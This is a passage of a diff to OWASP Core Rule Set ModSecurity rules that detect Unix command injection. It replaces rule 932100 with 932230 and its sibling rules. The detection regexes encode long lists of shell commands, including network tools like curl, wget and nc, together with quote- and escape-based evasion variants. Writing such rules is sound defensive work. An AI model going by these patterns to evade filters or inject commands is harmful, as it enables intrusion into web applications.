the regexp more complex. # -# To rebuild the word list regexp: -# cd util/regexp-assemble -# cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl -# -# Then insert the assembled regexp into this template: -# -# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* -# [regexp assembled from util/regexp-assemble/regexp-932100.txt] -# \b" \ -# # This is the base Rule to prevent Unix Command Injection -# Please refer other rules 932105,932106 to know more. -# -# .932100 -# ├── 932105 -# ├── 932106 -# -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:l[\\\\'\"]*(?:w[\\\\'\"]*p[\\\\'\"]*-[\\\\'\"]*(?:d[\\\\'\"]*(?:o[\\\\'\"]*w[\\\\'\"]*n[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*m[\\\\'\"]*p)|r[\\\\'\"]*e[\\\\'\"]*q[\\\\'\"]*u[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|m[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*r)|s(?:[\\\\'\"]*(?:b[\\\\'\"]*_[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*e|c[\\\\'\"]*p[\\\\'\"]*u|m[\\\\'\"]*o[\\\\'\"]*d|p[\\\\'\"]*c[\\\\'\"]*i|u[\\\\'\"]*s[\\\\'\"]*b|-[\\\\'\"]*F|h[\\\\'\"]*w|o[\\\\'\"]*f))?|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|m[\\\\'\"]*(?:o[\\\\'\"]*r[\\\\'\"]*e|a)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s)|e[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*(?:(?:f[\\\\'\"]*i[\\\\'\"]*l|p[\\\\'\"]*i[\\\\'\"]*p)[\\\\'\"]*e|e[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*o|(?:\s|<|>).*)|a[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*g(?:[\\\\'\"]*i[\\\\'\"]*n)?|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*m|(?:\s|<|>).*)|o[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*(?:t[\\\\'\"]*e|l)[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)|d[\\\\'\"]*(?:c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g|d[\\\\'\"]*(?:\s|<|>).*)|f[\\\\'\"]*t[\\\\'\"]*p(?:[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t)?|(?:[np]|y[\\\\'\"]*n[\\\\'\"]*x)[\\\\'\"]*(?:\s|<|>).*)|b[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p[\\\\'\"]*2)|s[\\\\'\"]*d[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*f[\\\\'\"]*f|t[\\\\'\"]*a[\\\\'\"]*r)|a[\\\\'\"]*(?:t[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|s[\\\\'\"]*h)|r[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*k[\\\\'\"]*s[\\\\'\"]*w|u[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*n)|c[\\\\'\"]*(?:o[\\\\'\"]*(?:m[\\\\'\"]*(?:p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*d)[\\\\'\"]*(?:\s|<|>).*|p[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*c)|h[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*(?:\s|<|>).*|f[\\\\'\"]*l[\\\\'\"]*a[\\\\'\"]*g[\\\\'\"]*s|a[\\\\'\"]*t[\\\\'\"]*t[\\\\'\"]*r|m[\\\\'\"]*o[\\\\'\"]*d)|r[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*b|(?:[cp]|a[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|u[\\\\'\"]*r[\\\\'\"]*l|s[\\\\'\"]*h)|f[\\\\'\"]*(?:i(?:[\\\\'\"]*(?:l[\\\\'\"]*e[\\\\'\"]*(?:t[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|(?:\s|<|>).*)|n[\\\\'\"]*d[\\\\'\"]*(?:\s|<|>).*))?|t[\\\\'\"]*p[\\\\'\"]*(?:s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*s|w[\\\\'\"]*h[\\\\'\"]*o|(?:\s|<|>).*)|u[\\\\'\"]*n[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n|(?:e[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*h|c)[\\\\'\"]*(?:\s|<|>).*|o[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*h|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p)|e[\\\\'\"]*(?:n[\\\\'\"]*(?:v(?:[\\\\'\"]*-[\\\\'\"]*u[\\\\'\"]*p[\\\\'\"]*d[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e)?|d[\\\\'\"]*(?:i[\\\\'\"]*f|s[\\\\'\"]*w))|x[\\\\'\"]*(?:p[\\\\'\"]*(?:a[\\\\'\"]*n[\\\\'\"]*d|o[\\\\'\"]*r[\\\\'\"]*t|r)|e[\\\\'\"]*c[\\\\'\"]*(?:\s|<|>).*)|c[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|s[\\\\'\"]*a[\\\\'\"]*c|v[\\\\'\"]*a[\\\\'\"]*l)|h[\\\\'\"]*(?:t[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|p[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*w[\\\\'\"]*d)|o[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e|i[\\\\'\"]*d)|(?:e[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*p)[\\\\'\"]*(?:\s|<|>).*|i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*y)|i[\\\\'\"]*(?:p[\\\\'\"]*(?:(?:6[\\\\'\"]*)?t[\\\\'\"]*a[\\\\'\"]*b[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*s|c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g)|r[\\\\'\"]*b(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|f[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*i[\\\\'\"]*g|d[\\\\'\"]*(?:\s|<|>).*)|g[\\\\'\"]*(?:(?:e[\\\\'\"]*t[\\\\'\"]*f[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*l|r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*c|i[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|z[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p)|u[\\\\'\"]*n[\\\\'\"]*z[\\\\'\"]*i[\\\\'\"]*p|d[\\\\'\"]*b)|a[\\\\'\"]*(?:(?:l[\\\\'\"]*i[\\\\'\"]*a[\\\\'\"]*s|w[\\\\'\"]*k)[\\\\'\"]*(?:\s|<|>).*|d[\\\\'\"]*d[\\\\'\"]*u[\\\\'\"]*s[\\\\'\"]*e[\\\\'\"]*r|p[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t|r[\\\\'\"]*(?:c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|p))|d[\\\\'\"]*(?:h[\\\\'\"]*c[\\\\'\"]*l[\\\\'\"]*i[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*t|(?:i[\\\\'\"]*f[\\\\'\"]*f|u)[\\\\'\"]*(?:\s|<|>).*|(?:m[\\\\'\"]*e[\\\\'\"]*s|p[\\\\'\"]*k)[\\\\'\"]*g|o[\\\\'\"]*(?:a[\\\\'\"]*s|n[\\\\'\"]*e)|a[\\\\'\"]*s[\\\\'\"]*h)|m[\\\\'\"]*(?:(?:k[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*r|o[\\\\'\"]*r[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|a[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*(?:x[\\\\'\"]*(?:\s|<|>).*|q)|l[\\\\'\"]*o[\\\\'\"]*c[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e)|j[\\\\'\"]*(?:(?:a[\\\\'\"]*v[\\\\'\"]*a|o[\\\\'\"]*b[\\\\'\"]*s)[\\\\'\"]*(?:\s|<|>).*|e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c)|k[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*l[\\\\'\"]*(?:a[\\\\'\"]*l[\\\\'\"]*l|(?:\s|<|>).*)|(?:G[\\\\'\"]*E[\\\\'\"]*T[\\\\'\"]*(?:\s|<|>)|\.\s).*|7[\\\\'\"]*z(?:[\\\\'\"]*[ar])?)\b" \ - "id:932100,\ +# for prefix + two and three characters. +# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932230.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932230 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[arx])?|(?:(?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|x)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|[ckz][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)|f[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dg]|g[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[&,<>\|]|(?:[\--\.0-9A-Z_a-z][\"'\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?)+[\s\v&,<>\|]).*|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?g)|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:s|z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:4|[\s\v&\),<>\|].*))|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*)?|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|(?:e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|(?:s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?h)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m)\b" \ + "id:932230,\ phase:2,\ block,\ capture,\ t:none,\ - msg:'Remote Command Execution: Unix Command Injection',\ + msg:'Remote Command Execution: Unix Command Injection (2-3 chars)',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ @@ -115,33 +134,57 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -# Apache 2.2 requires configuration file lines to be under 8kB. -# Therefore, some remaining commands have been split off to a separate rule. -# For explanation of this rule, see rule 932100. -# -# To rebuild the word list regexp: -# cd util/regexp-assemble -# cat regexp-932105.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl -# -# Then insert the assembled regexp into this template: -# -# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* -# [regexp assembled from util/regexp-assemble/regexp-932105.txt] -# \b" \ +# [ Unix command injection ] # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:s[\\\\'\"]*(?:e[\\\\'\"]*(?:t[\\\\'\"]*(?:(?:f[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*l[\\\\'\"]*)?(?:\s|<|>).*|e[\\\\'\"]*n[\\\\'\"]*v|s[\\\\'\"]*i[\\\\'\"]*d)|n[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*i[\\\\'\"]*l|d[\\\\'\"]*(?:\s|<|>).*)|h[\\\\'\"]*(?:\.[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*b|u[\\\\'\"]*t[\\\\'\"]*d[\\\\'\"]*o[\\\\'\"]*w[\\\\'\"]*n|(?:\s|<|>).*)|o[\\\\'\"]*(?:(?:u[\\\\'\"]*r[\\\\'\"]*c[\\\\'\"]*e|r[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|c[\\\\'\"]*a[\\\\'\"]*t)|c[\\\\'\"]*(?:h[\\\\'\"]*e[\\\\'\"]*d|p[\\\\'\"]*(?:\s|<|>).*)|t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g[\\\\'\"]*s|(?:l[\\\\'\"]*e[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|y[\\\\'\"]*s[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*l|u[\\\\'\"]*(?:(?:\s|<|>).*|d[\\\\'\"]*o)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|s[\\\\'\"]*h|v[\\\\'\"]*n)|p[\\\\'\"]*(?:k[\\\\'\"]*(?:g(?:(?:[\\\\'\"]*_)?[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*o)?|e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c|i[\\\\'\"]*l[\\\\'\"]*l)|t[\\\\'\"]*a[\\\\'\"]*r(?:[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p))?|a[\\\\'\"]*(?: